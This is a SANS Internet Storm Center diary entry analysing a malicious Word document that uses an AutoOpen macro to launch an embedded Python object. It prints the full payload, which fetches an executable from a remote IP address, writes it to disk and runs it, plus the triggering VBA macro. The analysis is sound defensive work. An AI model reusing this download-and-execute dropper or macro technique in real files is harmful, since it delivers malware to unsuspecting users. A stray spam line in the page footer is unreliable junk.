Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

A Mix of Python & VBA in a Malicious Word Document

Published: 2020-09-18
Last Updated: 2020-09-18 05:43:44 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

A few days ago, Didier wrote an interesting diary about embedded objects into an Office document[1]. I had a discussion about an interesting OLE file that I found. Because it used the same technique, I let Didier publish his diary first. Now, let's have a look at the document.

It's an OLE file that contains an embedded object:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py oleObject1.bin
  1:        76 '\x01CompObj'
  2: O     471 '\x01Ole10Native'
  3:         6 '\x03ObjInfo'
$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py oleObject1.bin -s 2 -d
?pJIkdw.pyC:\Users\CNIyi\Desktop\pJIkdw.py7C:\Users\CNIyi\AppData\Local\Temp\pJIkdw (2).pyr
import socket
import tempfile
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.2.100", 8080))
buf = ""
while True:
  data = s.recv(1024)
  if data:
    buf += data
  else:
    break
s.close
temp = tempfile.gettempdir() + "\\" + "JcNrGlx.exe"
f = open(temp, "wb")
f.write(buf)
f.close
f = None
os.system(temp)

The code is easy to understand: It connects to 192.168.2.100:8000, fetches a malicious PE file, dumps it on disk, and executes it. Note the private IP address used (RFC1918). It should be a test file (or from a red-team exercise?). The file hash is 40ae709cb1d6335c3a41863d2dca21bfa7bd493ebb3d7ddd72da4e09b09b2988 with a VT score of 5/60[2]. I searched via VT for more information about this file and found the document where it was coming from. 

It's a Word document (9f40fd5596a5d9f195017a5cae09799af8755f1436b8b9edbed768ccaa5dba67) with a VT score of 8/63[3]. The file contains indeed our original OLE file as reported by oledump.py:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious.docx
A: word/vbaProject.bin
 A1:       348 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    1327 'VBA/NewMacros'
 A4: m     924 'VBA/ThisDocument'
 A5:      2649 'VBA/_VBA_PROJECT'
 A6:      1082 'VBA/__SRP_0'
 A7:       104 'VBA/__SRP_1'
 A8:        84 'VBA/__SRP_2'
 A9:       107 'VBA/__SRP_3'
A10:       570 'VBA/dir'
B: word/embeddings/oleObject1.bin
 B1:        76 '\x01CompObj'
 B2: O     471 '\x01Ole10Native'
 B3:         6 '\x03ObjInfo'

The macro in stream 3 is very simple:

$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious.docx -s 3 -v
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
'
' AutoOpen Macro
'
'
    ActiveDocument.Shapes("Object 2").Select
    Selection.ShapeRange(1).OLEFormat.DoVerb VerbIndex:=wdOLEVerbPrimary
End Sub

The method (OLEFormat.DoVerb) requests an OLE object to perform the verb passed as argment[4]. 'wdOLEVerbPrimary' means to perform the verb that is invoked when the user double-clicks the object. The code will be executed only if Python is available on the targeted host.

The Word document seems corrupted and doesn't open properly in my sandbox. But looking at the files inside the zip archive, you discover that the OLE file is indeed embedded:

<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>

And:

<o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_s1026" DrawAspect="Content" ObjectID="_1400592552" r:id="rId7"/>

Yesterday, I found new occurrences of the same OLE file but trying to connect to other IP addresses:

Interestingly, the last IP address (the routable one) belongs to uscourts.gov (United States Courts)! The purpose of the file is still unclear but, being based on a Python payload, I presume the victim is targeted. Or, as I already did in the past, I spotted a red-team exercise preparation?

[1] https://isc.sans.edu/forums/diary/Office+Documents+with+Embedded+Objects/26558/
[2] https://bazaar.abuse.ch/sample/40ae709cb1d6335c3a41863d2dca21bfa7bd493ebb3d7ddd72da4e09b09b2988/
[3] https://bazaar.abuse.ch/sample/9f40fd5596a5d9f195017a5cae09799af8755f1436b8b9edbed768ccaa5dba67/
[4] https://docs.microsoft.com/en-us/office/vba/api/word.oleformat.doverb

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Suspicious Endpoint Containment with OSSEC
Sep 17th 2020
1 day ago by Xme (0 comments)

Do Vulnerabilities Ever Get Old? Recent "Mirai" Variant Scanning for 20 Year Old Amanda Version?
Sep 16th 2020
2 days ago by Johannes (0 comments)

Traffic Analysis Quiz: Oh No... Another Infection!
Sep 15th 2020
3 days ago by Brad (0 comments)

Not Everything About ".well-known" is Well Known
Sep 14th 2020
4 days ago by Johannes (0 comments)

Creating patched binaries for pentesting purposes
Sep 14th 2020
4 days ago by Manuel Humberto Santander Pelaacuteez (0 comments)

Office Documents with Embedded Objects
Sep 12th 2020
6 days ago by DidierStevens (0 comments)

What's in Your Clipboard? Pillaging and Protecting the Clipboard
Sep 11th 2020
1 week ago by Rob VandenBrink (0 comments)

View All Diaries →

Latest Discussions

Why is the entire community so... I don't know the words...
created Sep 8th 2020
1 week ago by Everseeker (0 replies)

I can not find the Bluetooth channel!
created Aug 31st 2020
2 weeks ago by Martin (0 replies)

Fellow Cyber Security Pro's, where do you get your regular feeds of information?
created Aug 11th 2020
1 month ago by Anonymous (0 replies)

Most important information security training and certifications
created Aug 10th 2020
1 month ago by Anonymous (0 replies)

Report Phishing to Major Cloud Providers
created Jul 12th 2020
2 months ago by Anonymous (0 replies)

View All Forums →

Latest News

Top Diaries

An infection from Rig exploit kit
Jun 17th 2019
1 year ago by Brad (0 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
3 years ago by Johannes (0 comments)

Malspam with password-protected Word docs pushing Dridex
Jun 18th 2019
1 year ago by Brad (0 comments)

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
3 years ago by Brad (0 comments)

Keep an Eye on Disposable Email Addresses
Mar 7th 2019
1 year ago by Xme (0 comments)

send lots of email to money@stifortunes.com